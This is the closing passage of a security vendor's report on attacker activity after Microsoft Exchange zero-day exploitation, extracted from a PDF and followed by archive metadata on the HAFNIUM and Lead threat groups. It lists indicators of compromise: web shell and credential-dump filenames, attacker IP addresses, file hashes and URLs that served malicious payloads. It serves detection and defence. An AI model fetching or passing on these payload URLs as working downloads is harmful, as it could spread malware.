error.aspx\r\nhttps://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/\r\nPage 12 of 15\n\nType Value\r\nFilename ErrorFF.aspx\r\nFilename exshell.psc1\r\nFilename Flogon.aspx\r\nFilename lsass.dump\r\nFilename m103w.zip\r\nFilename nvidia.msi\r\nFilename opera_browser.dll\r\nFilename opera_browser.exe\r\nFilename opera_browser.png\r\nFilename OutlookEN.aspx\r\nFilename MonitoringLog.cmd\r\nFilename MonitoringLog.exe\r\nFilename p\r\nFilename procdump64.exe\r\nFilename Service.Information.rtf\r\nFilename TimeoutLogout.aspx\r\nFilename 2.bat\r\nFilename script1.ps1\r\nFilename test.bat\r\nIP\r\nAddress\r\n178.162.217.107\r\nIP\r\nAddress\r\n178.162.203.202\r\nIP\r\nAddress\r\n178.162.203.226\r\nIP\r\nAddress\r\n85.17.31.122\r\nhttps://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/\r\nPage 13 of 15\n\nType Value\r\nIP\r\nAddress\r\n5.79.71.205\r\nIP\r\nAddress\r\n5.79.71.225\r\nIP\r\nAddress\r\n178.162.203.211\r\nIP\r\nAddress\r\n85.17.31.82\r\nIP\r\nAddress\r\n86.105.18.116\r\nIP\r\nAddress\r\n198.98.61.152\r\nIP\r\nAddress\r\n89.34.111.11\r\nMD5 7a6c605af4b85954f62f35d648d532bf\r\nMD5 e1ae154461096adb5ec602faad42b72e\r\nMD5 b3df7f5a9e36f01d0eb0043b698a6c06\r\nMD5 c60ac6a6e6e582ab0ecb1fdbd607705b\r\nMD5 42badc1d2f03a8b1e4875740d3d49336\r\nMD5 c515107d75563890020e915f54f3e036\r\nSHA1 02886f9daa13f7d9855855048c54f1d6b1231b0a\r\nSHA1 c7f68a184df65e72c59403fb135924334f8c0ebd\r\nSHA1 ab32d4ec424b7cd30c7ace1dad859df1a65aa50e\r\nSHA1 ba9de479beb82fd97bbdfbc04ef22e08224724ba\r\nSHA1 cee178da1fb05f99af7a3547093122893bd1eb46\r\nSHA1 2fed891610b9a770e396ced4ef3b0b6c55177305\r\nSHA-256 b212655aeb4700f247070ba5ca6d9c742793f108881d07e4d1cdc4ede175fcff\r\nSHA-256 d740136b37f894d76a7d4dedbe1ae51ed680c964bcb61e7c4ffe7d0e8b20ea09\r\nhttps://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/\r\nPage 14 of 15\n\nType Value\r\nSHA-256 bd79027605c0856e7252ed84f1b4f934863b400081c449f9711446ed0bb969e6\r\nSHA-256 4d24b359176389301c14a92607b5c26b8490c41e7e3a2abbc87510d1376f4a87\r\nSHA-256 c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf\r\nSHA-256 076d3ec587fc14d1ff76d4ca792274d1e684e0f09018b33da04fb1d5947a7d26\r\nURL http://103.212.223.210:9900/nvidia.msi\r\nURL http://86.105.18.116/news/code\r\nURL http://86.105.18.116/news/opera_browser.dll\r\nURL http://86.105.18.116/news/opera_browser.exe\r\nURL http://86.105.18.116/news/opera_browser.png\r\nURL http://89.34.111.11/3.avi\r\nURL http://microsoftsoftwaredownload.com:8080/c103w-at.zip\r\nURL http://microsoftsoftwaredownload.com:8080/m103w.zip\r\nURL http://p.estonine.com/p?e\r\nURL http://\u003cREDACTED_HOSTNAME\u003e/owa/auth/ /zfwqn\r\nURL http://\u003cREDACTED_HOSTNAME\u003e/owa/auth/%20/zfwqn\r\nReferences:\r\nhttps://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/\r\nhttps://aka.ms/ExchangeVulns\r\nhttps://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/\r\nhttps://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html\r\nhttps://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html\r\nhttps://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf\r\nSource: https://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-micros\r\noft-exchange/\r\nhttps://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/\r\nPage 15 of 15", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "origins": [ "web" ], "references": [ "https://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/" ], "report_names": [ "defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange" ], "threat_actors": [ { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "7c969685-459b-4c93-a788-74108eab6f47", "created_at": "2023-01-06T13:46:39.189751Z", "updated_at": "2026-04-10T02:00:03.241102Z", "deleted_at": null, "main_name": "HAFNIUM", "aliases": [ "Red Dev 13", "Silk Typhoon", "MURKY PANDA", "ATK233", "G0125", "Operation Exchange Marauder" ], "source_name": "MISPGALAXY:HAFNIUM", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "2704d770-43b4-4bc4-8a5a-05df87416848", "created_at": "2022-10-25T15:50:23.306305Z", "updated_at": "2026-04-10T02:00:05.296581Z", "deleted_at": null, "main_name": "HAFNIUM", "aliases": [ "HAFNIUM", "Operation Exchange Marauder", "Silk Typhoon" ], "source_name": "MITRE:HAFNIUM", "tools": [ "Tarrask", "ASPXSpy", "Impacket", "PsExec", "China Chopper" ], "source_id": "MITRE", "reports": null }, { "id": "529c1ae9-4579-4245-86a6-20f4563a695d", "created_at": "2022-10-25T16:07:23.702006Z", "updated_at": "2026-04-10T02:00:04.71708Z", "deleted_at": null, "main_name": "Hafnium", "aliases": [ "G0125", "Murky Panda", "Red Dev 13", "Silk Typhoon" ], "source_name": "ETDA:Hafnium", "tools": [], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775439058, "ts_updated_at": 1775826695, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/4dac904aa52be16139e9c7ef8337ecf9c4658b25.pdf", "text": "https://archive.orkl.eu/4dac904aa52be16139e9c7ef8337ecf9c4658b25.txt", "img": "https://archive.orkl.eu/4dac904aa52be16139e9c7ef8337ecf9c4658b25.jpg" } }